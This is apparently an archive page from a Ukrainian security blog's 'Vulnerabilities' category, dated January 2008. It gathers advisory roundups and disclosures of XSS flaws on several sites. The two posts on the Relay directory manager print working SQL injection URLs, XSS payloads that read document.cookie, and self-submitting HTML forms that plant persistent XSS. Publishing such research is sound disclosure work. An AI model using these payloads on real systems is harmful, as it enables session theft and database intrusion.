Архів для категорії 'Уразливості'

Редиректори Гугла

23:43 23.01.2008

В пошуковій системі Google є чимало редиректорів (redirectors). Пропоную вашій увазі повний перелік редиректорів Гугла, що я знайшов в минулому році.

Про деякі редиректори Гугла я вже розповідав раніше:

Ось нові редиректори на різних доменах Гугла:

Дані 5 редиректорів ще працювали у вересні минулого року, але зараз Гугл їх вже прикрив. Але ще 3 редиректора нормально працюють.

Добірка уразливостей

18:22 23.01.2008

В даній добірці уразливості в веб додатках:

  • Memory overwrites in JVM via malformed TrueType font (деталі)
  • Untrusted Java applet can connect to localhost (деталі)
  • MyCalendar multiple XSS (деталі)
  • Htaccess Passwort Generator 1.1 (ht_pfad) RFI Vulnerability (деталі)
  • Snitz Forums 2000 Version 3.1 SR4 (pop_profile.asp) Remote SQL Injection Vulnerability (деталі)
  • SQL injection vulnerability in webSPELL (деталі)
  • Authentication bypass in webSPELL (деталі)
  • Міжсайтовий скриптінг в ShopSite (деталі)
  • Vulnerability in Geckovich TaskTracker Pro (деталі)
  • PHP remote file inclusion vulnerability in OpenPinboard 2.0 (деталі)
  • PHP-інклюдинг в MxBB Portal mx_newssuite (деталі)
  • PHP-інклюдинг в BLOG:CMS (деталі)
  • SQL injection vulnerability in Vizayn Haber (деталі)
  • SQL injection vulnerability in ASP SiteWare autoDealer (деталі)
  • Cross-site scripting (XSS) vulnerability in Belchior Foundry vCard PRO (деталі)

Нові уразливості в Relay

23:53 22.01.2008

Нещодавно я вже писав про уразливості в Relay. І два дні тому, 20.01.2008, я знайшов нові SQL Injection та Cross-Site Scripting уразливості у веб додатку Relay (ajax directory manager).

SQL Injection:

http://site/relay/management/index.php?page=manage&module=users&action=details&uid=-1%20or%20id=1
http://site/relay/management/index.php?page=manage&module=users&action=details&uid=1%20and%20substring(username,1,1)=char(109)

http://site/relay/management/index.php?page=manage&module=clients&action=details&cid=-1%20or%20id=1
http://site/relay/management/index.php?page=manage&module=clients&action=details&cid=1%20and%20substring(version(),1,1)=3

XSS:

http://site/relay/management/index.php?page=manage&module=users&action=details&uid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/relay/management/index.php?page=manage&module=clients&action=details&cid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (Persistent):

http://site/relay/relay.php?relay=getFile&fileid=-1%20or%201=1/*%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливість в логах, де зберігається інформація про файли, які були скачені. При перегляді логів адміном на сторінці http://site/relay/management/index.php?page=stats&module=gen& action=latest XSS код буде виконано.

Вразлива версія Relay beta 1.0 (та попередні версії). Про уразливості розробникам веб додатка я повідомлю найближчим часом.

Уразливість на poshuk.com

20:22 22.01.2008

25.08.2007

У лютому, 22.02.2007, я знайшов Cross-Site Scripting уразливість на проекті http://poshuk.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

22.01.2008

XSS:

Дана уразливість досі не виправлена.

Добірка уразливостей

16:28 21.01.2008

В даній добірці уразливості в веб додатках:

  • SAXON version 5.4 XSS Attack Vulnerability (деталі)
  • teatro 1.6 ( basePath ) Remote File Include Vulnerability (деталі)
  • TikiWiki Remote PHP Code Evaluation Vulnerability (деталі)
  • New elinks packages fix information disclosure (деталі)
  • ESupport Multiple HTML Injection Vulnerabilities (деталі)
  • MediaWiki Cross-site Scripting (деталі)
  • XLAtunes 0.1 (album) Remote SQL Injection Vulnerability (деталі)
  • New links2 packages fix arbitrary shell command execution (деталі)
  • Vulnerability in com_categories in Joomla! (деталі)
  • PHP-інклюдинг в PhpLeague (деталі)
  • Міжсайтовий скриптінг і SQL-ін’єкція в Messageriescripthp (деталі)
  • Multiple vulnerabilities in Joomla! (деталі)
  • SQL injection vulnerability in Neocrome Land Down Under (LDU) (деталі)
  • File Upload Manager <= 1.0.6 (detail.asp) Remote SQL Injection Exploit (деталі)
  • SQL-ін’єкція в jclarens (деталі)

Уразливості в Relay

20:25 20.01.2008

29.10.2007

У травні, 26.05.2007, я знайшов SQL Injection та Cross-Site Scripting уразливості у веб додатку Relay (ajax directory manager).

Деталі уразливості з’являться пізніше, спочатку повідомлю розробникам веб додатка.

20.01.2008

SQL Injection:

http://site/relay/relay.php?relay=getFile&fileid=-1%20or%20id=1151513788
http://site/relay/relay.php?relay=getFile&fileid=1151513788%20and%20substring(version(),1,1)=3

XSS (Persistent):

На сторінці http://site/relay/relay.html

<img src='' onerror='javascript:alert(document.cookie)'>В полі: name.

PoC:

relay XSS.html

<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/relay/relay.php" method="post">
<input type="hidden" name="relay" value="setMeta">
<input type="hidden" name="fileid" value="1151513788">
<input type="hidden" name="filename" value="relay bird.jpg<img src='' onerror='javascript:alert(document.cookie)'>">
<input type="hidden" name="description" value="">
<input type="hidden" name="flags" value="normal">
</form>
</body>

На сторінці http://site/relay/relay.html

</textarea><img src='' onerror='javascript:alert(document.cookie)'>В полі: description.

PoC:

relay XSS2.html

<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/relay/relay.php" method="post">
<input type="hidden" name="relay" value="setMeta">
<input type="hidden" name="fileid" value="1151513788">
<input type="hidden" name="filename" value="relay bird.jpg">
<input type="hidden" name="description" value="</textarea><img src='' onerror='javascript:alert(document.cookie)'>">
<input type="hidden" name="flags" value="normal">
</form>
</body>

XSS:

На сторінці http://site/relay/relay.html

<img src='' onerror='javascript:alert(document.cookie)'>В полі: searchbar.

Вразлива версія Relay beta 1.0. Для виконання SQL Injection необхідно мати акаунт в системі (будь-то акаунт адміна чи користувача). А XSS уразливості можуть бути використані проти усіх користувачів системи.

Добірка уразливостей

19:28 19.01.2008

В даній добірці уразливості в веб додатках:

  • XLAtunes 0.1 (album) Remote SQL Injection Vulnerability (деталі)
  • Powerschool 404 Admin Exposure (деталі)
  • MediaWiki Cross-site Scripting (деталі)
  • Omnistar Live Software Cross-Site Scripting Vulrnability (деталі)
  • SAXON version 5.4 Multiple Path Disclosure Vulnerabilities (деталі)
  • SAXON version 5.4 SQL Injection Vulnerability (деталі)
  • AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit (деталі)
  • Newsletter MX <= 1.0.2 (ID) Remote SQL Injection Exploit (деталі)
  • Завантаження довільних файлів в dadaIMC (деталі)
  • PHP remote file inclusion vulnerability in b2 Blog (деталі)
  • New squirrelmail packages fix cross-site scripting (деталі)
  • SQL injection vulnerability in aFAQ 1.0 (деталі)
  • SQL-ін’єкція в Bluetrait (деталі)
  • Декілька уразливостей в AnnonceScriptHP (деталі)
  • Cross-site scripting (XSS) vulnerability in Joomla! (деталі)

Уразливості на bg.meta.ua

20:02 18.01.2008

23.08.2007

У лютому, 22.02.2007, я знайшов Cross-Site Scripting уразливості на проекті http://bg.meta.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно проектів компанії Мета я писав про уразливості на dating.meta.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

18.01.2008

XSS:

Дані уразливості вже виправлені.

Добірка уразливостей

16:36 17.01.2008

В даній добірці уразливості в веб додатках:

  • Joomla! swMenuFree 4.6 Component Remote File Include (деталі)
  • Several vulnerabilities in CMS Made Simple 1.1.3.1 (деталі)
  • wmtrssreader joomla component 1.0 Remote File Include Vulnerability (деталі)
  • Lighttpd: Multiple vulnerabilities (деталі)
  • Cisco Unified Communications Web-based Management Vulnerability (деталі)
  • SQL Injection Vulnerabilty in cdr_addon_mysql (деталі)
  • RSA Keon Multiple Cross-Site Scripting Vulnerabilities (деталі)
  • Multiple cross-site scripting vulnerabilities in Jim Hu and Chad Little PHP iCalendar (деталі)
  • Vulnerability in Calendar MX BASIC (деталі)
  • Vulnerability in tab editor for Personal .NET Portal (деталі)
  • Декілька уразливостей в MidiCart Shopping Cart (деталі)
  • PHP-інклюдинг в MxBB Portal mx_errordocs (деталі)
  • Multiple SQL injection vulnerabilities in Efkan Forum (деталі)
  • Vulnerability in Efkan Forum (деталі)
  • Численні уразливості в ProNews (деталі)

Уразливість на idc-cema.com

20:03 16.01.2008

27.02.2007

Декілька днів тому, 21.02.2007, я знайшов Cross-Site Scripting уразливість на http://idc-cema.com - сайті відомої компанії IDC. Про що найближчим часом сповіщу адміністрацію сайту.

В середині місяця, один з активних користувачів мого веб проекту, повідомив мені, що в Києві відбудеться конференція IDC IT Security Roadshow 2007 Інформаційна безпека бізнесу: люди та технології. Конференція як раз на тему секюріті, от мені воно повинно бути цікавим, міг би й сходити. Ця новина мене зацікавила. Хоча й останнім часом я на виставки та конференції рідко хожу. Останній раз взагалі був на ІТ виставці аж в 2004 (одразу на трьох виставках: Цифроманія 2004, KYIV HI-FI Show 2004 та Kyiv DigiPhoto Show 2004), хоча й раніше я подібні виставки регулярно відвідував.

Так от, зайшов я на сайт. І виявилося, що вже всі запрошення роздані (до 20.02), тому не встиг я (так і буде). Та раз вже я зайшов на сайт, то і звернув увагу на його безпеку - конференція все ж таки на секюріті тематику. І як я й очікував, сайт виявився вразливим (до XSS). Тому я б радив IDC перед тим як проводити конференції на тему безпеки, спочатку зайнятися безпекою власного сайта.

Детальна інформація про уразливість з’явиться пізніше.

16.01.2008

XSS:

Дана уразливість вже виправлена.